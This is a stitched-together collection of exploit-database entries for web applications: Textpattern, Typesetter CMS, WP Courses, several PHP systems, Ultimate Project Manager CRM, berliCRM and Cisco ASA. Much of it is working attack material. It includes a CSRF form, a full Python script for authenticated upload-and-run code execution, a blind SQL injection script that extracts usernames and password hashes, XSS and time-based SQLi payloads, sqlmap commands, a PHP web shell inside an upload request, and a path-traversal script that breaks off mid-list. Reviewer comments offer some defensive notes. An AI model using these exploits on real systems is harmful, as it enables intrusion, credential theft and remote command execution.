is_dst=0&dateformat=since&archive_dateformat=%25b+%25Oe%2C+%25I%3A%25M+%25p&permlink_mode=section_id_title&doctype=html5&logging=none&expire_logs_after=7& use_comments=1&img_dir=images&skin_dir=themes&file_base_path=%2Fvar%2Fwww%2Fvhosts%2Flocalhost%2Fhttpdocs%2Ftextpattern%2Ffiles& file_max_upload_size=2000000&tempdir=%2Fvar%2Fwww%2Fvhosts%2Flocalhost%2Fhttpdocs%2Ftextpattern%2Ftextpattern%2Ftmp&plugin_cache_dir=& smtp_from=&publisher_email=&override_emailcharset=0&enable_xmlrpc_server=0&default_event=article&theme_name=hive&module_pophelp=1&default_publish_status=4& 
title_no_widow=0&articles_use_excerpts=1&allow_form_override=1&attach_titles_to_permalinks=1&permlink_format=1&send_lastmod=1&publish_expired_articles=0&use_textile=1&enable_short_tags=1& use_plugins=1&admin_side_plugins=1&allow_page_php_scripting=1&allow_article_php_scripting=1&max_url_len=1000&syndicate_body_or_excerpt=1&rss_how_many=5&show_comment_count_in_feed=1& include_email_atom=0&use_mail_on_feeds_id=0&comments_on_default=0&comments_default_invite=Comment&comments_moderate=1&comments_disabled_after=42&comments_auto_append=0& comments_mode=0&comments_dateformat=%25b+%25Oe%2C+%25I%3A%25M+%25p&comments_sendmail=0&comments_are_ol=1&comment_means_site_updated=1& comments_require_name=1&comments_require_email=1&never_display_email=1&comment_nofollow=1&comments_disallow_images=0&comments_use_fat_textile=0&spam_blacklists=& custom_1_set=custom1&custom_2_set=custom2&custom_3_set=&custom_4_set=&custom_5_set=&custom_6_set=&custom_7_set=&custom_8_set=&custom_9_set=&custom_10_set=& step=prefs_save&event=prefs&_txp_token=0342db47efb6882b488f6d367067d720 ### EXPLOIT #### <html> <!-- CSRF PoC --> <body> <form action="https://localhost/textpattern/textpattern/index.php" method="POST"> <input type="hidden" name="Submit" value="Save" /> <input type="hidden" name="sitename" value="CHANGEHERE" /> <input type="hidden" name="siteurl" value="CHANGEHERE" /> <input type="hidden" name="site&#95;slogan" value="CHANGEHERE" /> <input type="hidden" name="production&#95;status" value="testing" /> <input type="hidden" name="timezone&#95;key" value="Europe&#47;Berlin" /> <input type="hidden" name="auto&#95;dst" value="0" /> <input type="hidden" name="is&#95;dst" value="0" /> <input type="hidden" name="dateformat" value="since" /> <input type="hidden" name="archive&#95;dateformat" value="&#37;b&#32;&#37;Oe&#44;&#32;&#37;I&#58;&#37;M&#32;&#37;p" /> <input type="hidden" name="permlink&#95;mode" value="section&#95;id&#95;title" /> <input type="hidden" name="doctype" value="html5" /> <input 
type="hidden" name="logging" value="none" /> <input type="hidden" name="expire&#95;logs&#95;after" value="7" /> <input type="hidden" name="use&#95;comments" value="1" /> <input type="hidden" name="img&#95;dir" value="images" /> <input type="hidden" name="skin&#95;dir" value="themes" /> <input type="hidden" name="file&#95;base&#95;path" value="&#47;var&#47;www&#47;vhosts&#47;&#46;demo&#46;localhost&#46;&#47;httpdocs&#47;textpattern&#47;files" /> <input type="hidden" name="file&#95;max&#95;upload&#95;size" value="2000000" /> <input type="hidden" name="tempdir" value="&#47;var&#47;www&#47;vhosts&#47;&#46;demo&#46;localhost&#46;&#47;httpdocs&#47;textpattern&#47;textpattern&#47;tmp" /> <input type="hidden" name="plugin&#95;cache&#95;dir" value="" /> <input type="hidden" name="smtp&#95;from" value="" /> <input type="hidden" name="publisher&#95;email" value="" /> <input type="hidden" name="override&#95;emailcharset" value="0" /> <input type="hidden" name="enable&#95;xmlrpc&#95;server" value="0" /> <input type="hidden" name="default&#95;event" value="article" /> <input type="hidden" name="theme&#95;name" value="hive" /> <input type="hidden" name="module&#95;pophelp" value="1" /> <input type="hidden" name="default&#95;publish&#95;status" value="4" /> <input type="hidden" name="title&#95;no&#95;widow" value="0" /> <input type="hidden" name="articles&#95;use&#95;excerpts" value="1" /> <input type="hidden" name="allow&#95;form&#95;override" value="1" /> <input type="hidden" name="attach&#95;titles&#95;to&#95;permalinks" value="1" /> <input type="hidden" name="permlink&#95;format" value="1" /> <input type="hidden" name="send&#95;lastmod" value="1" /> <input type="hidden" name="publish&#95;expired&#95;articles" value="0" /> <input type="hidden" name="use&#95;textile" value="1" /> <input type="hidden" name="enable&#95;short&#95;tags" value="1" /> <input type="hidden" name="use&#95;plugins" value="1" /> <input type="hidden" name="admin&#95;side&#95;plugins" value="1" /> <input 
type="hidden" name="allow&#95;page&#95;php&#95;scripting" value="1" /> <input type="hidden" name="allow&#95;article&#95;php&#95;scripting" value="1" /> <input type="hidden" name="max&#95;url&#95;len" value="1000" /> <input type="hidden" name="syndicate&#95;body&#95;or&#95;excerpt" value="1" /> <input type="hidden" name="rss&#95;how&#95;many" value="5" /> <input type="hidden" name="show&#95;comment&#95;count&#95;in&#95;feed" value="1" /> <input type="hidden" name="include&#95;email&#95;atom" value="0" /> <input type="hidden" name="use&#95;mail&#95;on&#95;feeds&#95;id" value="0" /> <input type="hidden" name="comments&#95;on&#95;default" value="0" /> <input type="hidden" name="comments&#95;default&#95;invite" value="Comment" /> <input type="hidden" name="comments&#95;moderate" value="1" /> <input type="hidden" name="comments&#95;disabled&#95;after" value="42" /> <input type="hidden" name="comments&#95;auto&#95;append" value="0" /> <input type="hidden" name="comments&#95;mode" value="0" /> <input type="hidden" name="comments&#95;dateformat" value="&#37;b&#32;&#37;Oe&#44;&#32;&#37;I&#58;&#37;M&#32;&#37;p" /> <input type="hidden" name="comments&#95;sendmail" value="0" /> <input type="hidden" name="comments&#95;are&#95;ol" value="1" /> <input type="hidden" name="comment&#95;means&#95;site&#95;updated" value="1" /> <input type="hidden" name="comments&#95;require&#95;name" value="1" /> <input type="hidden" name="comments&#95;require&#95;email" value="1" /> <input type="hidden" name="never&#95;display&#95;email" value="1" /> <input type="hidden" name="comment&#95;nofollow" value="1" /> <input type="hidden" name="comments&#95;disallow&#95;images" value="0" /> <input type="hidden" name="comments&#95;use&#95;fat&#95;textile" value="0" /> <input type="hidden" name="spam&#95;blacklists" value="" /> <input type="hidden" name="custom&#95;1&#95;set" value="custom1" /> <input type="hidden" name="custom&#95;2&#95;set" value="custom2" /> <input type="hidden" name="custom&#95;3&#95;set" 
value="" /> <input type="hidden" name="custom&#95;4&#95;set" value="" /> <input type="hidden" name="custom&#95;5&#95;set" value="" /> <input type="hidden" name="custom&#95;6&#95;set" value="" /> <input type="hidden" name="custom&#95;7&#95;set" value="" /> <input type="hidden" name="custom&#95;8&#95;set" value="" /> <input type="hidden" name="custom&#95;9&#95;set" value="" /> <input type="hidden" name="custom&#95;10&#95;set" value="" /> <input type="hidden" name="step" value="prefs&#95;save" /> <input type="hidden" name="event" value="prefs" /> <input type="hidden" name="&#95;txp&#95;token" value="0342db47efb6882b488f6d367067d720" /> <input type="submit" value="Do Action" /> </form> </body> </html>
# Exploit Title: Typesetter CMS 5.1 - Arbitrary Code Execution
# Exploit Author: Rodolfo "t0gu" Tavares
# Contact: @t0guu (TW)
# Software Homepage: https://www.typesettercms.com/
# Version : 5.1
# Tested on: Linux / Apache
# Category: WebApp
# Google Dork: intext:"Powered by Typesetter"
# Date: 2020-09-29
# CVE : CVE-2020-25790

######## Description ########
#
# The CMS Typesetter has functionality (web interface) where it is possible
# through an account with privileges to perform uploads. Through this
# functionality, it is possible to upload a .zip file that contains a
# malicious .php file. In the same functionality, there is also the
# possibility to extract the file through the same web interface, the
# attacker only needs to extract the .zip that was previously loaded and
# click on the malicious .php file to execute commands in the operating
# system.
#
######## Exploit with Poc ######## https://github.com/t0gu/CVE-2020-25790
####### Code #######
# see the poc at https://github.com/t0gu/CVE-2020-25790

# NOTE(review): the page carried this listing flattened onto a few long
# lines. Indentation and line breaks below are reconstructed from statement
# order; the else-binding in get_cookies() and the whitespace inside the
# banner string are best-effort and may differ from the author's original.
#
# Defender summary (from the code below): every step needs a valid admin
# session (login via /Admin), then the file manager at /Admin_Finder is
# driven with cmd=upload followed by cmd=extract, and the extracted file is
# finally requested under /data/_uploaded/file/. That sequence in the web
# server log is the detection signature; the mitigation is to keep archive
# extraction from placing executable server-side scripts into a web-served
# upload directory (or to not hand uploads to the PHP handler at all).

import argparse
from bs4 import BeautifulSoup
import requests
import sys
import re
import urllib3
from urllib3.exceptions import InsecureRequestWarning   # imported but never used; TLS verification is simply disabled via verify=False below

banner = """
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗███████╗ █████╗ ██████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██╔═████╗ ╚════██╗██╔════╝╚════██║██╔══██╗██╔═████╗
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝██║██╔██║█████╗ █████╔╝███████╗ ██╔╝╚██████║██║██╔██║
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ████╔╝██║╚════╝██╔═══╝ ╚════██║ ██╔╝ ╚═══██║████╔╝██║
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗╚██████╔╝ ███████╗███████║ ██║ █████╔╝╚██████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═════╝ ╚══════╝╚══════╝ ╚═╝ ╚════╝ ╚═════╝

by: t0gu

usage: main.py [-h] -p PASSWORD -l LOGIN -u URL

==> Exploit for CVE 2020-25790

optional arguments:
  -h, --help            show this help message and exit
  -p PASSWORD, --password PASSWORD
                        ==> admin password
  -l LOGIN, --login LOGIN
                        ==> admin login
  -u URL, --url URL     ==> main URL
"""
print(banner)

# Command-line handling. Note that -f/--file is required but is missing from
# the hand-written usage text in the banner above.
menu = argparse.ArgumentParser(description="==> Exploit for CVE 2020-25790")
menu.add_argument("-p", "--password", required=True, help="==> admin password")
menu.add_argument("-l", "--login", required=True, help="==> admin login")
menu.add_argument("-u", "--url", required=True, help="==> main URL")
menu.add_argument("-f", "--file", required=True, help="==> Malicous zip file with php file inside")
args = menu.parse_args()

login = args.login
password = args.password
url = args.url
file = args.file

# Defined but never passed to any requests call (no proxies= argument below),
# so this has no effect.
PROXIES = proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "https://127.0.0.1:8080",
}


class Exploit:
    """Drive the Typesetter admin file manager over HTTP.

    Holds the admin credentials, the base URL and an open handle on the zip
    file to upload. Each helper re-authenticates on its own (see the
    get_cookies() calls scattered through the methods), so one run produces
    several login POSTs to /Admin rather than a single session.
    """

    def __init__(self, login, password, url, file):
        self.login = login
        self.password = password
        self.url = url
        self.user_agent = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari"
        # Opened here and never closed explicitly; the handle is consumed by
        # the multipart upload in upload_zip().
        self.file = open(file, 'rb')

    def get_nounce(self):
        """Fetch /Admin and return the login nonce found in the page's form.

        Returns None when the request fails or nothing is found. The inner
        loop iterates the *children* of each <input> tag rather than the tag
        itself, and the guard `!= None or != ""` is always true, so exactly
        what gets returned depends on how BeautifulSoup nests the form —
        TODO confirm against a real response.
        """
        try:
            url = self.url + "/Admin"
            r = requests.get(url=url, headers={'User-Agent': self.user_agent}, timeout=3, verify=False)
            data = r.text
            soap_obj = BeautifulSoup(data, 'html.parser')
            for inp in soap_obj.find_all("input"):
                for v in inp:
                    nounce = v['value']
                    if nounce != None or nounce != "":
                        return nounce
        except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
            print(f'==> Error {e}')

    def get_hash_folders(self):
        """Ask /Admin_Finder for the directory tree and return one folder hash.

        Sends cmd=open with init/tree set and picks `files[2]['hash']` — a
        hard-coded index, so it assumes the third entry of the listing is
        the intended upload directory (TODO confirm). Returns None on a
        caught request error; a KeyError/IndexError from an unexpected JSON
        shape is not caught.
        """
        cookie_auth = self.get_cookies()
        hash_verified = self.get_verified()
        data_post = {'verified': hash_verified, 'cmd': 'open', 'target':'', 'init': 1, 'tree': 1}
        try:
            url = self.url + "/Admin_Finder"
            r = requests.post(url=url, data=data_post, headers={'User-Agent': self.user_agent, 'Cookie': cookie_auth}, timeout=10, verify=False)
            json_data = r.json()
            hash_dir = json_data['files'][2]['hash']
            return hash_dir
        except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
            print(f'==> Error {e}')

    def get_cookies(self):
        """Log in to /Admin and return a `name=value;` cookie string.

        The login POST is sent with allow_redirects=False so the Set-Cookie
        header of the login response itself is read. Only the first cookie
        in that header is kept. `r.headers['Set-Cookie']` raises KeyError
        when the server sets no cookie (e.g. bad credentials) and that is
        not in the caught exception tuple. Returns None when no nonce was
        obtained or on a caught error.
        """
        nounce = self.get_nounce()
        if nounce:
            try:
                url = self.url + "/Admin"
                data_post = {'file': '', 'cmd': 'login', 'login_nonce': nounce, 'username': self.login, 'user_sha': '', 'password': self.password, 'pass_md5': '', 'pass_sha': '', 'pass_sha512': '', 'remember': 'on', 'verified': ''}
                r = requests.post(url=url, verify=False, timeout=3, data=data_post, allow_redirects=False, headers={'User-Agent': self.user_agent, 'Cookie': 'g=2'})
                cookie_admin = r.headers['Set-Cookie']
                # Splitting on ':' first is a no-op for a normal Set-Cookie
                # value; the '=' and ';' splits do the actual parsing.
                cookie_name = cookie_admin.split(':')[0].split('=')[0]
                cookie_value = cookie_admin.split(':')[0].split('=')[1].split(';')[0]
                if cookie_name == None or cookie_name == "":
                    if cookie_value == None or cookie_value == "":
                        print("==> Something went wrong while login")
                else:
                    data = f"{cookie_name}={cookie_value};"
                    return data
            except (requests.exceptions.Timeout, requests.exceptions.BaseHTTPError) as e:
                print(f'==> Error while login {e}')

    def upload_zip(self):
        """Upload the zip to the chosen folder, then hand off to extract_file().

        Three separate authentications happen here (get_verified,
        get_hash_folders and get_cookies each log in). The print shows the
        file *object*, not its name. Only HTTPError/Timeout are caught; a
        missing 'added' key in the JSON reply raises uncaught.
        """
        url = self.url + '/Admin_Finder'
        hash_verified = self.get_verified()
        hash_dir = self.get_hash_folders()
        auth_cookie = self.get_cookies()
        try:
            print(f"==> Uploading file: {self.file}")
            data = {'cmd': "upload", "target": hash_dir, "verified": hash_verified}
            r = requests.post(url=url, verify=False, timeout=10, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, data=data, files={'upload[]': self.file})
            hash_file = r.json()['added'][0]['hash']
            self.extract_file(auth_cookie, hash_file, hash_verified)
        except (requests.exceptions.HTTPError, requests.exceptions.Timeout) as e:
            print(f"==> Error while uploading {e}")

    def extract_file(self, auth_cookie, hash_file, hash_verified):
        """Send cmd=extract for the uploaded archive and call xpl() on the first extracted entry.

        Args:
            auth_cookie: cookie string from get_cookies().
            hash_file: file hash returned by the upload reply.
            hash_verified: the 'verified' token from get_verified().
        """
        data_post={'verified': hash_verified, 'cmd': 'extract', 'target': hash_file}
        try:
            url = self.url + "/Admin_Finder"
            r = requests.post(url=url, data=data_post, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False)
            name_file = r.json()['added'][0]['name']
            print(f"==> All Hashes are collected from: {name_file}")
            self.xpl(auth_cookie,name_file)
        except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
            print(f'==> Error {e}')

    def xpl(self, auth_cookie, name_file):
        """Request the extracted file under /data/_uploaded/file/ and print any <pre> body.

        This GET is the observable proof of the issue: an access-log entry
        for /data/_uploaded/file/<name>?cmd=... right after the
        upload/extract POSTs. `m != ""` is always true for a Match object,
        so the condition reduces to `m is not None`.
        """
        try:
            url = self.url + "/data/_uploaded/file/" + name_file + "?cmd=id"
            new_url = url.replace("index.php", "")
            print(f"==> Try to exploit: {new_url}")
            r = requests.get(url=new_url, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False)
            pattern = r'<pre>(.*?)</pre>'
            m = re.search(pattern, r.text.replace("\n", ""))
            if m is not None and m != "":
                print(f"==> Vulnerable: {m.group(1)}")
        except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
            print(f'==> Error {e}')

    def get_verified(self):
        """Return the 'verified' token embedded in /Admin/Uploaded.

        The regex is greedy (`(.*)`) and the guard `m is not None or m != ""`
        is always true, so when the pattern does not match, `m.group`
        raises AttributeError, which is not caught here. Logs in again via
        get_cookies().
        """
        try:
            url = self.url + "/Admin/Uploaded"
            auth_cookie = self.get_cookies()
            r = requests.get(url=url, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False)
            data = r.text
            pattern_regex = r'"verified":"(.*)"}'
            m = re.search(pattern_regex, data)
            if m is not None or m != "":
                return m.group(1)
        except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
            print(f'==> Error {e}')


if __name__ == "__main__":
    obj = Exploit(login, password, url, file)
    obj.upload_zip()
  13. # Exploit Title: WP Courses < 2.0.29 - Broken Access Controls leading to Courses Content Disclosure # Exploit Author: Stefan Broeder, Marco Ortisi (redtimmysec) # Authors blog: https://www.redtimmy.com # Vendor Homepage: https://wpcoursesplugin.com/ # Version Vulnerable: < 2.0.29 # CVE: (requested but not assigned yet) WP Courses plugin < 2.0.29 does not protect course content, which can be accessed by unauthenticated users through the REST API (/wp-json/) endpoints (for example /wp-json/wp/v2/lesson/{lesson_id}). This could allow attackers to access paid content without authorization. Full story here: https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/
  14. # Exploit Title: Loan Management System 1.0 - Multiple Cross Site Scripting (Stored) # Google Dork: N/A # Date: 2020/10/19 # Exploit Author: Akıner Kısa # Vendor Homepage: https://www.sourcecodester.com/php/14471/loan-management-system-using-phpmysql-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/loan-management-system-using-php.zip # Version: 1.0 # Tested on: XAMPP # CVE : N/A Vulnerable Pages: http://localhost/loan/index.php?page=loans http://localhost/loan/index.php?page=payments http://localhost/loan/index.php?page=borrowers http://localhost/loan/index.php?page=loan_type Proof of Concept: 1 - Go to one of the vulnerable pages and click the edit button (on the right, in the action column). 2 - Fill in the fields with the "<script>alert(1)</script>" payload.
  15. # Title: Visitor Management System in PHP 1.0 - Authenticated SQL Injection # Exploit Author: Rahul Ramkumar # Date: 2020-09-16 # Vendor Homepage: https://projectworlds.in # Software Link: https://projectworlds.in/wp-content/uploads/2020/07/Visitor-Management-System-in-PHP.zip # Version: 1.0 # Tested On: Windows 10 Enterprise 1809 (x64_86) + XAMPP 7.2.33-1 # CVE: CVE-2020-25760 # Description The file front.php does not perform input validation on the 'rid' paramter. An attacker can append SQL queries to the input to extract sensitive information from the database. Note: This exploit can work pre-authentication as well, but need to change the 302 Response to 200 using an intercept tool. It should be pretty straight forward so I have not shown how. #POC 1) Navigate to the login page Example: http://192.168.1.72/visitor_management/index.php 2) Enter 'username' and 'password' 3) On the homepage, click on any visitor name and intercept the request 4) Save the request to file. Example, visitor_management_sqli.req GET /visitor_management/front.php?rid=373568 HTTP/1.1 Host: 192.168.1.72 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Referer: http://192.168.1.72/visitor_management/front.php Cookie: PHPSESSID=emvdv3k52ngs7uf0gliajb13ef Upgrade-Insecure-Requests: 1 5) Run SQLmap on the file, sqlmap -r visitor_management_sqli.req --dbms=mysql --threads=10
  16. # Exploit Title: User Registration & Login and User Management System With admin panel 2.1 - Persistent XSS # Google Dork: N/A # Date: 2020-08-07 # Exploit Author: yusufmalikul # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ # Version: 2.1 # Tested on: Windows 10 # CVE : N/A Description User Registration & Login and User Management System With admin panel 2.1 application from PHPgurukul is vulnerable to Persistent XSS via the fname, lname, email, and contact field name when user register on the site then admin viewing user list on manage user page triggering the payload. POC User side 1. Go to the user registration page http://localhost/loginsystem 2. Enter <img src="x" onerror=alert(document.cookie)> in one of the field (first name, last name, email, or contact) 3. Click sign up Admin side 1. Login to admin panel http://localhost/loginsystem/admin 2. After login successful it will redirect to manage user page 3. Payload triggered
  17. # Exploit Title: WordPress Plugin HS Brand Logo Slider 2.1 - 'logoupload' File Upload # Date: 2020-10-20 # Exploit Author: Net-Hunter # Google Dork: N/A # Software Link: https://ms.wordpress.org/plugins/hs-brand-logo-slider/ # Vendor Homepage: https://www.heliossolutions.co/ # Tested on: Linux Apache / Wordpress 5.5.1 # Version: 2.1 .:: Description ::. An authenticated user can bypass the plugin's uploader and upload an arbitrary file, because the extension of the uploaded file is only checked on the client side. .:: Vulnerable File ::. /wp-admin/admin.php?page=hs-brand-logo-slider.php .:: Vulnerable Code ::. Content-Disposition: form-data; name="logoupload"; filename="a.php" Content-Type: image/jpeg <?php echo system($_GET['cmd']); ?> .:: Proof Of Concept (Poc) ::. Step 1 - Log in to your account, select hs-brand-logo-slider from the menu, and upload a file Step 2 - Intercept the upload request with Burp Suite Step 3 - Rename the file, for example a.jpg to a.php Step 4 - The file has been uploaded; its path is shown in the table .:: Sample Request::. 
POST /wp-admin/admin.php?page=hs-brand-logo-slider.php HTTP/1.1 Host: 172.16.1.17:81 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://172.16.1.17:81/wp-admin/admin.php?page=hs-brand-logo-slider.php Content-Type: multipart/form-data; boundary=---------------------------407602771734524910834293111227 Content-Length: 81765 Origin: http://172.16.1.17:81 Connection: close Cookie: wordpress_558570ec66c8a5729fc0bd982edbc38a=admin%7C1603353703%7Ckvhq1mWuwe5MGz3wZpw8Rxi5eiJtxYMQDHzZFCkebGS%7C15d778148be9d49e48b6275e009642192e10b1d8a9e5e44a191141084f2618b6; wp-settings-time-2=1592045029; wp-settings-2=libraryContent%3Dbrowse%26editor%3Dtinymce; wp_learn_press_session_558570ec66c8a5729fc0bd982edbc38a=9c5476d130f39254b97895578a6cf9e2%7C%7C1603353694%7C%7Cd6957c27eda7a311e486866587a08500; wordpress_test_cookie=WP+Cookie+check; wordpress_lp_guest=fad4f6783283c86762dc8944423947d0; wordpress_logged_in_558570ec66c8a5729fc0bd982edbc38a=admin%7C1603353703%7Ckvhq1mWuwe5MGz3wZpw8Rxi5eiJtxYMQDHzZFCkebGS%7C80d7786798b351d10cbdfe07ba50c31d2400ccbfb173d4b90255cab42791ccd7; wp-settings-time-1=1603180907 Upgrade-Insecure-Requests: 1 -----------------------------407602771734524910834293111227 Content-Disposition: form-data; name="brandname" aaa -----------------------------407602771734524910834293111227 Content-Disposition: form-data; name="logoupload"; filename="eftekharr.php" Content-Type: image/jpeg <?php echo system($_GET['cmd']); ?> -----------------------------407602771734524910834293111227 Content-Disposition: form-data; name="logourl" http://aa.com -----------------------------407602771734524910834293111227 Content-Disposition: form-data; name="sortorder" 1 -----------------------------407602771734524910834293111227 Content-Disposition: form-data; name="submit_data" Submit 
-----------------------------407602771734524910834293111227--
# Exploit Title: Ultimate Project Manager CRM PRO 2.0.5 - SQLi Credentials Leakage
# Date: 2020-16-09
# Exploit Author: nag0mez
# Vendor Homepage: https://ultimatepro.codexcube.com/
# Version: <= 2.0.5
# Tested on: Kali Linux 2020.2

# The SQLi injection does not allow UNION payloads. However, we can guess usernames and passwords fuzzing the database.

#!/usr/bin/env python3
#-*- coding: utf-8 -*-

# NOTE(review): the page carried this listing flattened onto two long lines;
# indentation below is reconstructed from statement order.
#
# Defender summary: this is a boolean-blind probe against the `search`
# field of POST /frontend/get_article_suggestion/, one request per guessed
# character, with the response body length as the oracle. Expect dozens of
# POSTs to that path from one client whose `search` value starts with
# `' or (select` — that is the log signature. The fix on the application
# side is a parameterised query for the search term.

import requests
import sys

# The original vulnerability was found on a server with an invalid SSL certificate,
# which Python could not verify. I added the verify=False parameter to avoid SSL check.
# The lack of verification results in a warning message from Python.
# To get a clean output, we will ignore all warnings.
import warnings
warnings.filterwarnings("ignore")

host = 'https://testurl.test' # Change
url = "{}/frontend/get_article_suggestion/".format(host)
# Guess alphabets. '_' and '%' are LIKE wildcards and are deliberately absent;
# a username containing any character outside `chars` stops extraction early.
chars = '1234567890abcdefghijklmnopqrstuvwxyz'
hex_chars = 'abcdef1234567890'

def send_payload(payload):
    """POST `payload` as form data and return the response body length.

    The length is the only thing the callers look at. Any exception
    (connection refused, TLS failure, timeout, ...) prints a message and
    terminates the process — `e` itself is never shown.
    """
    try:
        response = requests.post(url, data=payload, verify=False)
        content = response.text
        length = len(content)
        return length
    except Exception as e:
        print('Cannot connect to host. Exit.')
        sys.exit(1)

def get_first_user():
    """Recover the first row of tbl_users.username one character at a time.

    Each round tries every character in `chars` as the next prefix
    character; a body longer than 2 bytes is treated as "true" (presumably
    an empty JSON list/object is the 2-byte negative — TODO confirm).
    Matching is done with LIKE, so case depends on the column collation.
    Returns whatever prefix was found when no character matched, possibly ''.
    """
    found = True
    known = ''
    while found:
        found = False
        for c in chars:
            test = known + c
            payload = {'search': "' or (select username from tbl_users limit 1)like'{}%'-- ".format(test)}
            length = send_payload(payload)
            if length > 2:
                found = True
                known += c
                print(c, end='')
                sys.stdout.flush()
                break
    return known

def get_hash(username):
    """Recover tbl_users.password for `username`, same oracle as get_first_user().

    Only hex digits are tried, so this assumes the stored value is a hex
    digest (the caller labels it SHA-512). `username` is interpolated into
    the probe unquoted beyond the surrounding single quotes.
    """
    found = True
    known = ''
    while found:
        found = False
        for c in hex_chars:
            test = known + c
            payload = {'search': "' or (select password from tbl_users where username='{}' limit 1)like'{}%'-- ".format(username,test)}
            length = send_payload(payload)
            if length > 2:
                found = True
                known += c
                print(c, end='')
                sys.stdout.flush()
                break
    return known

if __name__ == '__main__':
    print('Exploit started.')
    print('Guessing username...')
    username = get_first_user()
    if username != '':
        print('\nUsername found: {}'.format(username))
    else:
        print('\nCould not get username! Exit.')
        sys.exit(1)
    print('Guessing password SHA512 hash...')
    sha = get_hash(username)
    if sha != '':
        print('\nHash found: {}'.format(sha))
    else:
        print('\nCould not get Hash! Exit.')
        sys.exit(1)
  19. # Title: Online Students Management System 1.0 - 'username' SQL Injections # Exploit Author: George Tsimpidas # Date: 2020-10-09 # Vendor Homepage: www.sourcecodester.com # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/studentrecord_0.zip # Version : 1.0 # Tested on: Ubuntu 18.04.5 LTS (Bionic Beaver) # Category: Webapp # Description The files index.php on the main login page, and the index.php on the /admin/ login page does not perform input validation on the regno and username parameters. An attacker can send malicious input in the post request to http://localhost/index.php or either http://localhost/admin/index.php and bypass authentication, extract sensitive information etc. #POC 1) Navigate to the admin login page Example: http://localhost/admin/index.php 2) Fill in dummy values for 'username' and 'password' fields and send the request via an HTTP intercept tool 3) Save the request to file. Example, student_record_sqli.req POST /admin/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 32 Origin: http://localhost DNT: 1 Connection: close username=admin&password=dummy 4) Run SQLmap on the file, sqlmap -r student_record_sqli.req --dbms=mysql --threads=10 -p username
  20. # Exploit Title: berliCRM 1.0.24 - 'src_record' SQL Injection # Google Dork: N/A # Date: 2020-10-11 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://www.berlicrm.de # Software Link: https://github.com/berliCRM/berlicrm/archive/1.0.24.zip # Version: 1.0.24 # Tested on: Kali Linux # CVE : N/A ========== Post Request ========================= POST /index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: localhost Cookie: PHPSESSID=bab89b6fc39e1fd2c26877a4544cbb64 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Content-Length: 226 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 Connection: Keep-alive __vtrftk=sid:ff114f440469f69f1507ebd04c65e05ba2fcc8d3%2C1602392658&module=Contacts&src_field=contact_id&src_module=Contacts&src_record=1&triggerEventName=postSelection721&view=Popup ============= Vulnerable Parameter =============== src_record (POST) ============= Payload =========================== 0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z
  21. # Exploit Title: Cisco ASA and FTD 9.6.4.42 - Path Traversal # Date: 2020-10-10 # Exploit Author: 3ndG4me # Vendor: www.cisco.com # Product: https://www.cisco.com/c/en/us/products/security/asa-firepower-services/index.html # CVE : CVE-2020-3452 TARGET=$1 CISCO_KNOWN_FILES="logo.gif http_auth.html user_dialog.html localization_inc.lua portal_inc.lua include nostcaccess.html ask.html no_svc.html svc.html session.js useralert.html ping.html help app_index.html tlbr portal_forms.js logon_forms.js win.js portal.css portal.js sess_update.html blank.html noportal.html portal_ce.html portal.html home logon_custom.css portal_custom.css preview.html session_expired custom portal_elements.html commonspawn.js common.js appstart.js appstatus relaymonjar.html relaymonocx.html relayjar.html relayocx.html portal_img color_picker.js color_picker.html cedhelp.html cedmain.html cedlogon.html cedportal.html cedsave.html cedf.html ced.html lced.html files 041235123432C2 041235123432U2 pluginlib.js shshim do_url clear_cache connection_failed_form apcf ucte_forbidden_data ucte_forbidden_url cookie 